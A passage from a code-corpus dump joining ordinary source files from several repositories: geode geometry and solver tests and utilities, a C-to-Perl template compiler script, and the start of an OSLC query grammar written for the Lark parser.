a = sqrt(8) # see http://en.wikipedia.org/wiki/Tetrahedron
assert relative_error(mesh.surface_area(X),sqrt(3)*a**2) < 1e-5
print mesh.volume(X),sqrt(2)/12*a**3
assert relative_error(mesh.volume(X),sqrt(2)/12*a**3) < 1e-5
def test_sphere():
mesh,X = sphere_mesh(4)
assert relative_error(magnitudes(X),1)<1e-7
centers = normalized(X[mesh.elements].mean(axis=1))
assert relative_error(dots(centers,mesh.element_normals(X)),1)<2e-5
def test_revolution():
n = 32
alpha = linspace(-pi/2,pi/2,n)
radius = cos(alpha)
height = sin(alpha)
for c0 in 0,1:
for c1 in 0,1:
print '\nclosed = %d %d'%(c0,c1)
r = radius[c0:len(radius)-c1]
mesh,X = surface_of_revolution(base=0,axis=(0,0,1),radius=r,height=height,resolution=n,closed=(c0,c1))
assert mesh.nodes()==len(X)==n*n+(c0+c1)*(1-n)
ae = relative_error(mesh.surface_area(X),4*pi)
print 'area error = %g'%ae
assert ae<5e-3
ve = relative_error(mesh.volume(X),4*pi/3)
print 'volume error = %g'%ve
assert ve<1e-2
assert len(mesh.nonmanifold_nodes(True))==0
assert len(mesh.nonmanifold_nodes(False))==n*(2-c0-c1)
def test_grid():
mesh = grid_topology(5,7)
assert not len(mesh.nonmanifold_nodes(True))
assert len(mesh.nonmanifold_nodes(False))==2*(5+7+2)-4
def test_torus():
mesh = torus_topology(5,7)
assert not len(mesh.nonmanifold_nodes(False))
assert all(mesh.segment_soup().neighbors().sizes()==6)
def test_double_torus():
mesh = double_torus_mesh()
assert not len(mesh.nonmanifold_nodes(False))
assert all(mesh.segment_soup().neighbors().sizes()==7)
if __name__=='__main__':
test_revolution()
test_icosahedron()
test_tetrahedron()
test_sphere()
test_torus()
test_double_torus()
```
#### File: geode/geometry/test_surface_levelset.py
```python
from __future__ import division
from geode import *
from geode.geometry.platonic import *
from numpy import random
def test_surface_levelset():
random.seed(127130)
mesh,X = sphere_mesh(4)
surface = SimplexTree(mesh,X,10)
particles = ParticleTree(random.randn(1000,3),10)
print 'fast'
phi,normal,triangles,weights = surface_levelset(particles,surface,10,True)
mags,Xn = magnitudes_and_normalized(particles.X)
print 'phi range %g %g'%(phi.min(),phi.max())
# Compare with sphere distances
phi3 = mags-1
normal3 = Xn
assert absolute(phi-phi3).max() < .002
assert maxabs(absolute(dots(normal,normal3))-1) < .001
normal_error = (phi>1e-3)*magnitudes(normal-normal3)
if 1:
i = argmax(normal_error)
print 'i %d, X %s, phi %g, phi3 %g, normal %s, normal3 %s'%(i,particles.X[i],phi[i],phi3[i],normal[i],normal3[i])
e = max(normal_error)
print 'normal error =',e
assert e < .04
# Check weights
closest = particles.X-phi.reshape(-1,1)*normal
assert maxabs(magnitudes(closest)-1) < .002
closest2 = (weights.reshape(-1,3,1)*X[mesh.elements[triangles]]).sum(axis=1)
assert relative_error(closest,closest2) < 1e-7
# Compare with slow mesh distances
print 'slow'
phi2,normal2,_,_ = slow_surface_levelset(particles,surface)
if 0:
i = argmax(abs(abs(phi)-phi2))
print 'i %d, phi %g, phi2 %g'%(i,phi[i],phi2[i])
assert relative_error(abs(phi),phi2) < 1e-7
assert all(magnitudes(cross(normal,normal2))<1e-7)
```
#### File: geode/geode/__init__.py
```python
from __future__ import absolute_import
import platform
def is_windows():
return platform.system()=='Windows'
# Import geode_wrap, possibly as geode_all on windows
if is_windows():
from . import geode_all as geode_wrap
from .geode_all import *
else:
from . import geode_wrap
from .geode_wrap import *
# py.test overrides AssertionError, so make sure C++ knows about it
geode_wrap.redefine_assertion_error(AssertionError)
# Import children
from .utility import *
from .array import *
if has_exact():
from .exact import *
from .geometry import *
from .value import *
from .vector import *
from .mesh import *
real = geode_wrap.real
```
#### File: geode/math/test_hypot.py
```python
from __future__ import division,print_function
from geode import *
def test_hypot():
# On some platforms Python.h will try to #define hypot as _hypot
# Since some platforms define hypot as:
# double hypot(double a, double b) { return _hypot(a,b); }
# With that #define in effect the definition recurses into itself, so calling hypot can overflow the stack
# geode/python/config.h tries to ensure we still have a hypot function but could also break things
# We just make sure we can call hypot without a stack overflow:
assert geode_test_hypot(1.,0.) == 1.
if __name__=='__main__':
test_hypot()
```
#### File: geode/mesh/test_lower_hull.py
```python
from __future__ import division
from numpy import *
from geode import TriangleSoup, lower_hull, write_mesh
from geode.geometry.platonic import cube_mesh, icosahedron_mesh, sphere_mesh
from geode.vector import relative_error
def test_lower_hull(filename = None):
mesh,X = icosahedron_mesh()
mlh,Xlh = lower_hull(mesh, X, [0.3, 0.3, 1.0], -4., 5./180.*pi, 30./180.*pi)
if filename is not None:
write_mesh(filename+'-input.obj', mesh, X)
write_mesh(filename+'-output.obj', mlh, Xlh)
if __name__ == '__main__':
test_lower_hull("lower_hull_test")
```
#### File: geode/solver/nelder_mead.py
```python
from __future__ import division
from numpy import *
from geode.vector import *
from geode.utility import Log
def optimize_generator(x0,step0,tolerance,verbose=False):
# Initialize simplex
d = len(x0)
x = empty((d+1,d))
x[:] = asarray(x0).reshape(1,d)
for i in xrange(d):
x[i+1,i] += step0
f = empty(d+1)
for i in xrange(d+1):
f[i] = yield x[i],False
if verbose:
Log.write('nelder-mead: initialized f(%s) = %g'%(x[i],f[i]))
# Control parameters
alpha = 1.
gamma = 2.
rho = .5
sigma = .5
# Loop until convergence
while 1:
# Sort vertices in increasing order of f
p = sorted(xrange(d+1),key=lambda i:f[i])
f = f[p]
x = x[p]
if verbose:
Log.write('nelder-mead: best x = %s, f(x) = %g'%(x[0],f[0]))
Log.write('nelder-mead: worst x = %s, f(x) = %g'%(x[-1],f[-1]))
# Check if we're converged
diameter = max(magnitude(x[i]-x[j]) for i in xrange(d+1) for j in xrange(i+1,d+1))
if verbose:
Log.write('nelder-mead: diameter = %g'%diameter)
if diameter <= tolerance:
yield x[0],True
return
def replace(fn,xn):
f[-1] = fn
x[-1] = xn
# Perform reflection
xm = x[:d].mean(axis=0)
xr = xm + alpha*(xm-x[-1])
fr = yield xr,False
if f[0] <= fr <= f[-2]: # Accept reflection
if verbose:
Log.write('nelder-mead: reflected')
replace(fr,xr)
elif fr <= f[0]: # Perform expansion
xe = xm + gamma*(xm-x[-1])
fe = yield xe,False
if fe < fr:
if verbose:
Log.write('nelder-mead: expansion succeeded')
replace(fe,xe)
else:
if verbose:
Log.write('nelder-mead: expansion failed')
replace(fr,xr)
else: # Perform contraction
xc = x[-1] + rho*(xm-x[-1])
fc = yield xc,False
if fc < f[-1]:
if verbose:
Log.write('nelder-mead: contracted')
replace(fc,xc)
else: # All else failed; perform reduction
if verbose:
Log.write('nelder-mead: reduced')
for i in xrange(1,d+1):
x[i] = x[0] + sigma*(x[i]-x[0])
f[i] = yield x[i],False
def optimize(f,x0,step0,tolerance,verbose=False):
gen = optimize_generator(x0,step0,tolerance,verbose)
fx = None
while 1:
x,done = gen.send(fx)
if done:
if verbose:
print 'converged: x = %s'%x
return x
else:
fx = f(x)
if verbose:
print 'f(%s) = %g'%(x,fx)
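# Usage sketch (illustrative; assumes the geode extension is importable, since
# the convergence test above calls magnitude()): minimize a smooth 2d bowl
# starting from the origin with an initial simplex step of 0.5.
#   from geode.solver.nelder_mead import optimize
#   xmin = optimize(lambda x: (x[0]-1.)**2 + (x[1]+2.)**2, (0.,0.), .5, 1e-6)
#   # xmin converges to approximately (1,-2)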
```
#### File: geode/solver/test_min.py
```python
from __future__ import division
from geode import *
from geode.solver import nelder_mead
from numpy import *
def test_brent():
def f(x):
return x**3*(x-4)
tol = 1e-7
x,fx,it = brent(f,(-2,1,4),tol,100)
assert abs(x-3)<tol
assert abs(fx+27)<tol
def test_bracket():
random.seed(8523815)
for _ in xrange(20):
co = 5*random.randn(4)
def f(x):
return co[0]+x*(co[1]+x*(co[2]+x*(co[3]+x)))
(a,b,c),(fa,fb,fc) = bracket(f,0,.1*random.randn())
assert a<b<c
assert fb<min(fa,fc)
assert allclose(fa,f(a))
assert allclose(fb,f(b))
assert allclose(fc,f(c))
def test_powell():
evals = [0]
for tweak in 0,1/2:
def f(x):
evals[0] += 1
x,y = x
f = x*x+2*y*y+x-3*y+3 + tweak*sin(5*x)*sin(5*y)
#print 'f(%g,%g) = %g'%(x,y,f)
return f
x = zeros(2)
tol = 1e-4
fx,i = powell(f,x,.1,tol,tol,100)
print 'x = %s, fx = %g, iters = %d, evals = %d'%(x,fx,i,evals[0])
xc = (-0.87892353,0.89360935) if tweak else (-.5,.75)
fc = 1.34897 if tweak else 13/8
assert maxabs(x-xc)<2*tol
assert abs(fx-fc)<tol
def test_nelder_mead():
def f((x,y)):
return abs((3-2*x)*x-2*y+1)**(7/3) + abs((3-2*y)*y-x+1)**(7/3)
x = nelder_mead.optimize(f,(-.9,-1),.3,1e-5,verbose=1)
assert f(x) < 1e-9
if __name__=='__main__':
test_powell()
test_bracket()
test_brent()
```
#### File: geode/structure/test_heap.py
```python
from __future__ import division,print_function
from geode import *
from numpy import random
def test_heap():
random.seed(83131)
for n in xrange(30):
for m in 2,max(n//3,1),1000:
x = random.randint(m,size=n).astype(int32)
y = heapsort_test(x)
assert all(sort(x)==y)
if __name__=='__main__':
test_heap()
```
#### File: geode/utility/json_conversion.py
```python
import json
from numpy import *
from geode import *
def from_ndarray(v, typ = float):
return map(typ, v.flatten())
def from_array(v, typ = float):
return map(typ, v)
to_json_fn = {}
from_json_fn = {}
from_json_fn['int'] = lambda v: int(v)
from_json_fn['real'] = lambda v: real(v)
from_json_fn['float'] = lambda v: float(v)
from_json_fn['string'] = lambda v: str(v)
from_json_fn['bool'] = lambda v: bool(v)
from_json_fn['ndarray'] = lambda v : array(v)
from_json_fn['mat22'] = lambda v: Matrix(array(v).reshape(2, 2))
from_json_fn['mat33'] = lambda v: Matrix(array(v).reshape(3, 3))
from_json_fn['mat44'] = lambda v: Matrix(array(v).reshape(4, 4))
from_json_fn['frame2'] = lambda v: Frames(v['t'], Rotation.from_sv(array(v['r'])))
from_json_fn['frame3'] = lambda v: Frames(v['t'], Rotation.from_sv(array(v['r'])))
from_json_fn['box2'] = from_json_fn['box3'] = lambda v: Box(v['min'], v['max'])
from_json_fn['TriangleSoup'] = from_json_fn['SegmentSoup'] = lambda v: v
from_json_fn['dict'] = lambda v: v
to_json_fn[dict] = lambda v: { 't': 'dict', 'v': v }
to_json_fn[int] = lambda v: { 't': 'int', 'v': v }
to_json_fn[real] = lambda v: { 't': 'real', 'v': v }
to_json_fn[float] = lambda v: { 't': 'float', 'v': v }
to_json_fn[str] = lambda v: { 't': 'string', 'v': v }
to_json_fn[bool] = lambda v: { 't': 'bool', 'v': v }
to_json_fn[Box2d] = to_json_fn[Box3d] = lambda v: {
't': ('box%s') % len(v.min),
'v': {
'min': from_array(v.min),
'max': from_array(v.max)
}
}
to_json_fn[list] = lambda v: {
't': 'list',
'v': v # let's hope this works on the client...
}
to_json_fn[ndarray] = lambda v: {
't': 'ndarray',
'v': {
'shape': v.shape,
'data': from_ndarray(v)
}
}
to_json_fn[Matrix] = lambda v: {
't': ('mat%s%s') % (len(v), len(v[0])),
'v': from_ndarray(v)
}
to_json_fn[Frames] = lambda v: {
't': ('frame%s') % (len(v.t)),
'v': {
't': map(float, v.t),
'r': map(float, v.r.sv)
}
}
to_json_fn[TriangleSoup] = lambda v: {
't': 'TriangleSoup',
'v': from_ndarray(v.elements, int)
}
to_json_fn[SegmentSoup] = lambda v: {
't': 'SegmentSoup',
'v': from_ndarray(v.elements, int)
}
to_json_fn[MutableTriangleTopology] = lambda v: {
't': 'TriangleTopology',
'v': {
'vertices': from_ndarray(v.vertex_field(vertex_position_id)),
'elements': from_ndarray(v.elements(), int)
}
}
def to_json(v):
fn = to_json_fn.get(type(v), None)
if callable(fn):
return fn(v)
else:
raise TypeError("Don't know how to transcribe type %s to json." % type(v))
def to_json_string(v):
return json.dumps(to_json(v), allow_nan = False, separators = (',', ':'))
def from_json(d):
fn = from_json_fn.get(d['t'])
return fn(d['v']) if callable(fn) else None
def from_json_string(s):
return from_json(json.loads(s))
def register(typ, name, to_fn, from_fn):
to_json_fn[typ] = to_fn
from_json_fn[name] = from_fn
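# Usage sketch (illustrative): the register() function above teaches both
# converters about a custom type. Point2 and the tag 'point2' are
# hypothetical, not part of geode:
#   register(Point2, 'point2',
#            lambda v: {'t': 'point2', 'v': [float(v.x), float(v.y)]},
#            lambda v: Point2(*v))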
```
#### File: geode/utility/Log.py
```python
from __future__ import (with_statement,absolute_import)
from contextlib import contextmanager
import platform
if platform.system()=='Windows':
from .. import geode_all as geode_wrap
else:
from .. import geode_wrap
configure = geode_wrap.log_configure
initialized = geode_wrap.log_initialized
cache_initial_output = geode_wrap.log_cache_initial_output
copy_to_file = geode_wrap.log_copy_to_file
finish = geode_wrap.log_finish
write = geode_wrap.log_print
error = geode_wrap.log_error
flush = geode_wrap.log_flush
@contextmanager
def scope(format,*args):
geode_wrap.log_push_scope(format%args)
try:
yield
finally:
geode_wrap.log_pop_scope()
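# Usage sketch (illustrative): scopes nest, and the pop is guaranteed even on
# exceptions because of the try/finally above.
#   with scope('frame %d',n):
#     write('advancing')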
```
#### File: geode/utility/tryfile.py
```python
__all__ = 'read write pack unpack Atom'.split()
import sys
import zlib
import struct
from cStringIO import StringIO
signature = '\003TRY'
current_version = 2
nonleaf_makers = {}
nonleaf_parsers = {}
leaf_makers = {}
leaf_parsers = {}
def register_nonleaf(typename,type,maker,parser,version=0):
"""Register a nonleaf atom type.
maker(value) should return a series of (name,value) pairs, and
parser(pairs,version) should convert the given (name,value) pairs
into a value.
"""
nonleaf_makers[type] = typename,version,maker
nonleaf_parsers[typename] = type,parser
def register_leaf(typename,type,maker,parser,version=0):
"""Register a leaf atom type.
maker(value) should return a string containing the binary contents
of value, and parser(data,version) should unpack the binary string
data into a value.
"""
leaf_makers[type] = typename,version,maker
leaf_parsers[typename] = type,parser
def register_subtype(typename,type):
if typename in leaf_parsers:
leaf_makers[type] = leaf_makers[leaf_parsers[typename][0]]
elif typename in nonleaf_parsers:
nonleaf_makers[type] = nonleaf_makers[nonleaf_parsers[typename][0]]
else:
raise ValueError("atom type '%s' is not registered"%typename)
already_warned = set()
def warn_unknown(type):
if type not in already_warned:
if type in nonleaf_parsers:
raise IOError("Leaf atom has nonleaf type '%s'"%type)
elif type in leaf_parsers:
raise IOError("Nonleaf atom has leaf type '%s'"%type)
else:
print>>sys.stderr, "warning: unknown atom type '%s'"%type
already_warned.add(type)
def read_uint(file):
"""Read a uint from a file."""
result = 0
shift = 0
while True:
try:
byte = ord(file.read(1))
except TypeError:
raise EOFError
if byte&128:
result |= (byte&127)<<shift
shift += 7
else:
return result|(byte<<shift)
def uint_to_str(i):
"""Convert a uint to a string."""
s = ''
while True:
if i>127:
s += chr(i&127|128)
i >>= 7
else:
return s+chr(i)
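# Worked example of the variable-length encoding above (7 data bits per byte,
# continuation bit set on every byte except the last): 300 = 0b100101100, so
# uint_to_str(300) == chr(0b10101100)+chr(0b00000010), and read_uint
# reassembles 44 + (2<<7) == 300 from those two bytes.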
def read_string(file):
return file.read(read_uint(file))
def string_to_str(s):
return uint_to_str(len(s))+s
def read_crc(file):
"""Read a crc32 from a file."""
return struct.unpack('<i',file.read(4))[0]
def crc_to_str(crc):
"""Convert a crc32 to a string."""
return struct.pack('<I',crc%2**32)
IsLeaf = 1
Compressed = 2
CRC = 4
FlagMask = 7
class Atom(object):
__slots__ = ['name','type','version','flags','data_size','data_crc']
def to_str(self):
return ''.join([string_to_str(self.name),string_to_str(self.type),uint_to_str(self.version),uint_to_str(self.flags)])
class Leaf(Atom):
__slots__ = ['data']
def to_str(self):
return Atom.to_str(self)+uint_to_str(self.data_size)+crc_to_str(self.data_crc)
def parse(self,file):
data = file.read(self.data_size)
if self.flags&CRC and (self.data_crc-zlib.crc32(data))%2**32:
raise IOError('data crc32 mismatch: expected %d, got %d'%(self.data_crc,zlib.crc32(data)))
if self.flags&Compressed:
data = zlib.decompress(data)
def unknown(data,version): # fallback parser: keep the raw bytes for unregistered atom types
warn_unknown(self.type)
self.data = data
return self
_,parser = leaf_parsers.get(self.type,(None,unknown))
return parser(data,self.version)
def write_data(self,file):
file.write(self.data)
class Nonleaf(Atom):
__slots__ = ['children']
def to_str(self):
return ''.join([Atom.to_str(self),uint_to_str(len(self.children))]+[c.to_str() for c in self.children])
def parse(self,file):
children = [(c.name,c.parse(file)) for c in self.children]
def unknown(children,version): # fallback parser: keep the children for unregistered atom types
warn_unknown(self.type)
self.children = children
return self
_,parser = nonleaf_parsers.get(self.type,(None,unknown))
return parser(children,self.version)
def write_data(self,file):
for c in self.children:
c.write_data(file)
def read_atom(file):
name = read_string(file)
type = read_string(file)
version = read_uint(file)
flags = read_uint(file)
if flags&~FlagMask:
raise IOError("unknown flags %d"%(flags&~FlagMask))
if flags&IsLeaf:
atom = Leaf()
atom.data_size = read_uint(file)
if flags&CRC:
atom.data_crc = read_crc(file)
else:
atom = Nonleaf()
atom.children = [read_atom(file) for _ in range(read_uint(file))]
atom.data_size = sum(a.data_size for a in atom.children)
atom.name = name
atom.type = type
atom.version = version
atom.flags = flags
return atom
def make_atom(name,value):
t = type(value)
if t in leaf_makers:
atom = Leaf()
atom.type,atom.version,maker = leaf_makers[t]
atom.data = zlib.compress(maker(value))
atom.data_size = len(atom.data)
atom.data_crc = zlib.crc32(atom.data)
atom.flags = IsLeaf|Compressed|CRC
elif t in nonleaf_makers:
atom = Nonleaf()
atom.type,atom.version,maker = nonleaf_makers[t]
atom.children = [make_atom(*p) for p in maker(value)]
atom.data_size = sum(c.data_size for c in atom.children)
atom.flags = 0
else:
raise TypeError("can't convert unregistered type '%s' to atom"%t.__name__)
atom.name = name
return atom
def read_stream(file):
'''Read a .try file from an open stream.'''
if file.read(4)!=signature:
raise IOError('bad signature')
header_size = read_uint(file)
header_start = file.tell()
version = read_uint(file)
if not 1<=version<=2:
raise IOError('unknown version %d'%version)
tree_size = read_uint(file)
data_size = read_uint(file)
if version>1:
tree_crc = read_crc(file)
if header_size<file.tell()-header_start:
raise IOError('header_size smaller than header')
tree_start = header_start+header_size
file.seek(tree_start) # Skip over the rest of the header
# Read atom tree. This reads and parses the entire atom hierarchy, but does not parse the leaf data.
tree = file.read(tree_size)
tree_file = StringIO(tree)
try:
atom = read_atom(tree_file)
except EOFError:
raise IOError('unexpected end of tree section, size %d is too small'%tree_size)
if version>1 and (tree_crc-zlib.crc32(tree))%2**32:
raise IOError('tree crc32 mismatch: expected %d, got %d'%(tree_crc,zlib.crc32(tree)))
if tree_file.tell()!=tree_size:
raise IOError('expected tree size %d, got %d'%(tree_size,tree_file.tell()))
data_start=file.tell()
# Read data section by traversing the atom tree.
result = atom.parse(file)
data_end = file.tell()
if data_end-data_start!=data_size:
raise IOError('expected data size %d, got %d'%(data_size,data_end-data_start))
return result
def write_stream(file,value):
'''Write a .try file to an open stream.'''
# Build atom tree in memory
atom = make_atom('',value)
tree = atom.to_str()
# Write header
file.write(signature)
tree_size = len(tree)
data_size = atom.data_size
tree_crc = zlib.crc32(tree)
header = ''.join(uint_to_str(i) for i in (current_version,tree_size,data_size))+crc_to_str(tree_crc)
file.write(string_to_str(header))
# Write tree
file.write(tree)
# Write data
atom.write_data(file)
def read(filename):
'''Read the contents of a .try file in its entirety.
Return (name,data), where data is the parsed contents of the
toplevel tree atom. The mapping from atom data to python types
is dict to dict, array to array, as one would expect. Unknown
atom types are parsed into Atom.'''
return read_stream(open(filename,'rb'))
def write(filename,value):
'''Write a new .try file in its entirety.
Data must be a nested tree of dictionaries with scalars or numpy
arrays as leaves.'''
write_stream(open(filename,'wb'),value)
def unpack(buffer):
'''Unpack a string in .try format into data.'''
return read_stream(StringIO(buffer))
def pack(value):
'''Pack data into a .try format string.'''
file = StringIO()
write_stream(file,value)
return file.getvalue()
### Dict
def parse_dict(pairs,version):
return dict(pairs)
register_nonleaf('dict',dict,dict.iteritems,parse_dict)
### Array
import numpy
# Start dtype map off with platform independent dtypes only
int_to_dtype = map(numpy.dtype,'bool int8 uint8 int16 uint16 int32 uint32 int64 uint64 float32 float64'.split())
dtype_num_to_int = dict((d.num,i) for i,d in enumerate(int_to_dtype))
def make_array(a):
a = numpy.asarray(a)
try:
dtype = dtype_num_to_int[a.dtype.num]
except KeyError:
# dtype isn't correctly hashable, so do linear search for matching dtype
for i,d in enumerate(int_to_dtype):
if a.dtype==d:
dtype = dtype_num_to_int[a.dtype.num]=dtype_num_to_int[d.num]
break
else:
raise TypeError("unregistered dtype '%s'"%a.dtype)
# Convert numpy array to little endian buffer, flipping endianness if necessary
return ''.join([uint_to_str(i) for i in (dtype,len(a.shape))+a.shape]+[a.astype(a.dtype.newbyteorder('<')).tostring()])
def parse_array(data,version):
file = StringIO(data)
dtype = int_to_dtype[read_uint(file)]
rank = read_uint(file)
shape = [read_uint(file) for _ in xrange(rank)]
# Convert little endian buffer to a numpy array, flipping endianness if necessary
array = (numpy.frombuffer(data,dtype=dtype.newbyteorder('<'),offset=file.tell()).astype(dtype) if numpy.product(shape) else numpy.empty(0,dtype)).reshape(shape)
return numpy.require(array,requirements='a')
register_leaf('array',numpy.ndarray,make_array,parse_array)
for t in int,bool,float,numpy.int32,numpy.int64,numpy.float32,numpy.float64:
register_subtype('array',t)
### Str
register_leaf('str',str,str,lambda s,v:s)
### Tuple and List
def tuple_maker(x):
return ((str(i),y) for i,y in enumerate(x))
def parse_tuple(pairs,version):
x = []
for i,(n,y) in enumerate(pairs):
assert i==int(n)
x.append(y)
return tuple(x)
register_nonleaf('list',list,tuple_maker,parse_tuple)
register_nonleaf('tuple',tuple,tuple_maker,parse_tuple)
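# Round-trip sketch (illustrative): with the registrations above, any nested
# dict/list/tuple of strings, scalars, and numpy arrays packs and unpacks, e.g.
#   data = {'name':'demo','values':numpy.arange(5)}
#   assert unpack(pack(data))['name'] == 'demo'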
```
#### File: geode/value/__init__.py
```python
from __future__ import absolute_import
from geode import *
from . import parser
import types
def is_value(value):
return isinstance(value, Value)
def is_prop(prop):
return is_value(prop) and prop.is_prop()
def const_value(value, name=""):
return const_value_py(value, name)
def Prop(name,default,shape=None):
if shape is None:
return make_prop(name,default)
return make_prop_shape(name,default,shape)
class cache_method(object):
'''Decorator to cache a class method per instance. The equivalent of 'cache' in the function case.'''
def __init__(self,f):
self._name = '__'+f.__name__
self.f = f
def __get__(self,instance,owner):
try:
return getattr(instance,self._name)
except AttributeError:
if type(instance)==types.InstanceType:
raise TypeError('cache_method can only be used on new-style classes (must inherit from object)')
value = cache(types.MethodType(self.f,instance,owner))
object.__setattr__(instance,self._name,value)
return value
def cache_named(name):
def inner(f):
return cache_named_inner(f, name)
return inner
```
#### File: geode/vector/test_register.py
```python
from geode.vector import *
from numpy import *
def test_register():
random.seed(217301)
for _ in xrange(10):
for d in 2,3:
X0 = random.randn(10,d)
t = random.randn(d)
A = random.randn(d,d)
r,_ = linalg.qr(A)
if linalg.det(r)<0:
r[0] = -r[0]
X1 = t + Matrix(r)*X0
X2 = t + Matrix(A)*X0
f = rigid_register(X0,X1)
B = affine_register(X0,X2)
assert relative_error(t,f.t) < 1e-5
assert relative_error(r,f.r.matrix()) < 1e-5
assert relative_error(t,B[:d,d]) < 1e-5
assert relative_error(A,B[:d,:d]) < 1e-5
assert all(B[d]==hstack([zeros(d),1]))
``` |
{
"source": "jjravi/p3lang",
"score": 3
} |
#### File: jjravi/p3lang/cperlcompile.py
```python
import re
import os
import sys
import argparse
class CPerlCompile():
def __init__(self):
self.output_file_lines = []
self.output_file_lines.append("#!/usr/bin/perl\n")
self.output_file_lines.append("use warnings;\n")
self.output_file_lines.append("use strict;\n")
self.output_file_lines.append("\n")
self.output_file_lines.append("my $argv1 = $ARGV[0];\n")
self.output_file_lines.append("my $gen_file_buffer = <<END_C_CODE;\n")
def get_command_line_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('-i', dest='input_path',
help='REQUIRED: The p3lang file',
required=True)
parser.add_argument('-o', dest='output_file_name',
help='Rename the output to <input>.c',
nargs='?', type=str, default=None, required=False)
self.args = parser.parse_args()
#self.rcPath = self.args.input_path
#if self.args.output_file_name is not None:
# self.outputFileName = self.args.output_file_name
return parser.parse_args()
def should_i_output(self, line):
if "# vim: set filetype=c:" in line:
return False
if line.strip().startswith("{."):
return False
if line.strip().startswith(".}"):
return False
return True
def parse_p3lang_file(self, verbose=False):
self.add_signal_dict = {}
print(": Opening: ", self.args.input_path)
add_signal_list = []
inside_perl_script = False
with open(self.args.input_path, 'r') as file_object:
for line in file_object:
if line.strip().startswith("{."):
self.output_file_lines.append("@{[eval{\n")
inside_perl_script = True
if line.strip().startswith(".}"):
self.output_file_lines.append("}]}\n")
inside_perl_script = False
if self.should_i_output(line):
# re.sub(r'(\n+)(?=[A-Z])', r'\\n', line)
if not inside_perl_script:
line = re.sub(r'([\\n]+)(\")', r'\\\\n"', line)
self.output_file_lines.append(line)
self.output_file_lines.append("END_C_CODE\n")
self.output_file_lines.append("# make sure the file is called: file.c.p3\n")
self.output_file_lines.append("# file.c.p3 -> file.c\n")
self.output_file_lines.append("my $foo = substr($0, 0, -3);\n")
self.output_file_lines.append("open (OUT, \">$foo\") or die \"Unable to open $foo for writing:$!\\n\";\n")
self.output_file_lines.append("binmode OUT;\n")
self.output_file_lines.append("print OUT $gen_file_buffer;\n")
self.output_file_lines.append("close OUT;\n")
self.output_file_lines.append("__END__\n")
self.output_file_lines.append("\n")
#print(line, end="")
return self.add_signal_dict
def save_expanded_file(self):
with open(self.args.output_file_name, 'w', newline='') as outfile:
# outfile.write("rc_path,full_signal_path,\n")
for line in self.output_file_lines:
outfile.write(line)
# outfile.write("%s,%s,\n"%(key, signal_path))
if __name__ == '__main__':
CPerlCompile_inst = CPerlCompile()
print("Starting")
CPerlCompile_inst.get_command_line_args()
# CPerlCompile_inst.get_rc_path_list()
CPerlCompile_inst.parse_p3lang_file()
# CPerlCompile_inst.build_full_signal_path_dict()
CPerlCompile_inst.save_expanded_file()
print("Finished, exiting now.")
``` |
{
"source": "jjrevuel/ELM-Python-Client",
"score": 2
} |
#### File: ELM-Python-Client/elmclient/_queryparser.py
```python
import logging
import re
import lark
import lxml.etree as ET
from . import rdfxml
logger = logging.getLogger(__name__)
#
# This enhanced OSLC Query grammar supports "||", "&&" and bracketed evaluation
# This is based on the EBNF in OSLC Query 3.0 standard https://tools.oasis-open.org/version-control/browse/wsvn/oslc-core/trunk/specs/oslc-query.html
# Differences/enhancements from the OSLC 3.0 definition:
# You can combine compound_terms using && and || - note when using these the compound_term MUST be in ( ) (which also makes reading the expression easier)
# also accepts just a single compound_term with no ( ) needed (i.e. this is basically the vanilla OSLC Query 3.0 syntax)
# In order to allow the user to use friendly names for attributes and enumeration values, there is a new terminal valueidentifier - these are resolved in the context of the identifier (attribute) in the LHS of the term - a name with a space must be surrounded by ' '
# You are of course free to use <https://...> URIs for identifiers and value identifiers. Good luck with that!
# identifiers and valueidentifiers must start with [a-zA-Z0-9_]
# Identifiers can't use backslash escapes
# langtag can be used but will be ignored
# ^^ type-specifiers can be used and will be passed on into the query, but not checked/enforced
# In order to allow the user to use names with spaces (e.g. an enumeration value 'In Process'), put ' ' around them
# Won't resolve identifiers or valueidentifiers if they include a : (can't tell the difference between that usage and e.g. dcterms:identifier)
# DNG 6.0.6.1 doesn't support the Query 3.0 PrefixedName on RHS of a term as a value, so they are all converted to <https://...> references
# For DNG You can refer to a foldername using e.g. $"folder name" - this gets converted to the URI of the folder in <> NOT EXTENSIVELY TESTED!
# You can refer to a user name using e.g. @"user name" - this gets converted to the server-specific URI of the user
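# Illustrative query strings accepted by this grammar (the attribute and
# enumeration names below are hypothetical, shown only to document the syntax):
#   dcterms:identifier=23
#   (state='In Process') && ((priority='High') || (priority='Medium'))
#   dcterms:creator=@"Jane Smith" and dcterms:modified>="2021-01-01"^^xsd:datetime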
_core_oslc_grammar = """
?compound_term : simple_term
| simple_term boolean_op compound_term -> do_oslcand
boolean_op : "and"
?simple_term : term
| scoped_term
?scoped_term : identifier_wc "{" compound_term "}"
term : identifier_wc comparison_op value
| identifier_wc inop in_val
inop : "in"
in_val : "[" invalue ("," invalue)* "]"
invalue : value
| "*" unsignedinteger -> reqid_to_module_uris
?identifier_wc : identifier | WILDCARD
identifier : dottedname
| prefixedname
| simpleidentifier
dottedname : ( URI_REF_ESC | NAME | "'"SPACYNAME "'" ) "." ( NAME | "'" SPACYNAME "'" )
prefixedname : ( URI_REF_ESC | NAME ) ":" NAME
simpleidentifier : ( NAME | "'" SPACYNAME "'" )
NAME : /[a-zA-Z0-9_]\w*/
value : URI_REF_ESC
| boolean
| decimal
| typedliteralstring
| literalstring
| valueidentifier
| urioffoldername
| uriofuser
| uriofmodule
valueidentifier : ( ( URI_REF_ESC | NAME | "'" SPACYNAME "'" ) ":" )? NAME
| "'" SPACYNAME "'"
| "~" unsignedinteger -> reqid_to_core_uri
unsignedinteger : /[1-9][0-9]*/
URI_REF_ESC : /<https?:.*?>/
SPACYNAME : /[a-zA-Z0-9_][^']*/
urioffoldername : "$" string_esc
uriofuser : "@" string_esc
uriofmodule : "^" string_esc
typedliteralstring : string_esc (langtag | ("^^" prefixedname))
literalstring : string_esc
boolean : TRUE | FALSE
WILDCARD : "*"
comparison_op : EQ
| NE
| LT
| GT
| LE
| GE
EQ: "="
NE: "!="
LT: "<"
LE: "<="
GE: ">="
GT: ">"
TRUE : "true"
FALSE : "false"
decimal : SIGNED_NUMBER
newstring_esc : "'" /[^']+/ "'"
string_esc : ESCAPED_STRING
langtag : /@[a-z][a-z0-9_]*/
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
"""
_enhanced_oslc3_query_grammar = """
where_expression : compound_term
| logicalor_term
?logicalor_term : logicalcompound_term
